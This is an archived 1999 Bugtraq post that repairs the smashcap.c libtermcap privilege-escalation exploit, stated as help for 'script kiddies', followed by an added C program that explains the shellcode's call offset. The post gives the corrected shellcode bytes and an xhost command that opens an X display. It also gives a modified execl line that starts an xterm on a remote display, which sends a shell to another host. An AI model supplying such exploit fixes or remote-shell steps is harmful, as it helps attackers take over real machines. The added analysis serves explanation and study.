libtermcap exploit fix ... smashcap.c

From: Hudin Lucian (luciat_private)
Date: Sun Aug 22 1999 - 15:18:16 PDT


Hi, since Bugtraq is a full-disclosure list, let's help the script kiddies
a bit and scare the sysadmins a little bit more...

To make smashcap.c work, all you have to do is remove one 0xff character
before /bin/sh in the shellcode, so the line would be:

  "\x80\xe8\xdc\xff\xff\xff/bin/sh"

instead of:

  "\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"

Also, you'll have to be on a console running X to exploit it, but if
you have another box where you can start X then it's OK:

  myhost$ startx; xhost +victim.com
  victim$ ./smashcap

and modify the last line of smashcap.c to:

  execl("/usr/X11R6/bin/xterm", "xterm", "-display", "victim.com:0", 0);

Well, it works on most Red Hats (tested on 5.1 and 5.2). On Slackware it
sigsegvs; you need to work on it a little bit, sorry I don't have a
Slackware box to work on.

regards, lucysoft
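
Why removing that single 0xff matters, as an added example (this is not code from the post or from smashcap.c): the byte sequence e8 dc ff ff ff is an x86 `call rel32`, and a call pushes the address of the byte immediately following it. In the jmp/call shellcode pattern that pushed address is used as the pointer to "/bin/sh", so the string has to start exactly at opcode + 5. With the extra 0xff the pushed pointer lands on a 0xff byte and the path becomes "\xff/bin/sh". The program below embeds only the two lines quoted above (the rest of the smashcap.c shellcode is not on this page, so the call's target, which lies before the fragment, is decoded and reported but not checked) and tests whether "/bin/sh" sits where the call would point. The function and variable names are my own.

```c
/* Added example: check that the string a `call rel32` is meant to push a
 * pointer to really starts right after the call. Only the fragment quoted
 * in the post is used; the full smashcap.c shellcode is not on the page. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decode the little-endian signed 32-bit displacement that follows an
 * 0xE8 (call rel32) or 0xE9 (jmp rel32) opcode. */
static int32_t rel32_at(const unsigned char *p)
{
    uint32_t u = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return (int32_t)u;
}

/* Locate the first 0xE8 in buf[0..len). The call pushes the address of
 * opcode + 5, so return 1 if the bytes there begin with `expect`, 0 if
 * they do not, and -1 if no call opcode is present at all. If disp is
 * non-NULL it receives the decoded displacement; if target is non-NULL it
 * receives the call target as an offset relative to buf (may be negative,
 * meaning the target lies before the fragment we were given). */
int string_follows_call(const unsigned char *buf, size_t len,
                        const char *expect, long *disp, long *target)
{
    size_t i, elen = strlen(expect);
    for (i = 0; i + 5 <= len; i++) {
        if (buf[i] != 0xE8)
            continue;
        int32_t d = rel32_at(buf + i + 1);
        size_t after = i + 5;               /* what the call pushes */
        if (disp)
            *disp = d;
        if (target)
            *target = (long)after + d;
        if (after + elen > len)
            return 0;
        return memcmp(buf + after, expect, elen) == 0;
    }
    return -1;
}

/* The two lines quoted in the post, as C literals (trailing NUL included,
 * exactly as they would be in smashcap.c). */
static const unsigned char fixed_line[]  = "\x80\xe8\xdc\xff\xff\xff/bin/sh";
static const unsigned char broken_line[] = "\x80\xe8\xdc\xff\xff\xff\xff/bin/sh";

int check_fixed(void)
{
    return string_follows_call(fixed_line, sizeof fixed_line, "/bin/sh", NULL, NULL);
}

int check_broken(void)
{
    return string_follows_call(broken_line, sizeof broken_line, "/bin/sh", NULL, NULL);
}

/* Displacement and target of the call in the fixed line (target is an
 * offset relative to the start of the fragment). */
long fixed_disp(void)
{
    long d = 0;
    string_follows_call(fixed_line, sizeof fixed_line, "/bin/sh", &d, NULL);
    return d;
}

long fixed_target(void)
{
    long t = 0;
    string_follows_call(fixed_line, sizeof fixed_line, "/bin/sh", NULL, &t);
    return t;
}

int main(void)
{
    printf("call rel32 displacement: %ld (target is %ld bytes before the fragment)\n",
           fixed_disp(), -fixed_target());
    printf("fixed line : /bin/sh follows the call: %s\n", check_fixed() ? "yes" : "no");
    printf("broken line: /bin/sh follows the call: %s\n", check_broken() ? "yes" : "no");
    return 0;
}
```

Running it shows the displacement is -36 in both variants; only the position of "/bin/sh" relative to the call changes, which is exactly why one stray byte breaks the exec while everything else in the shellcode still "works".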
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:01 PDT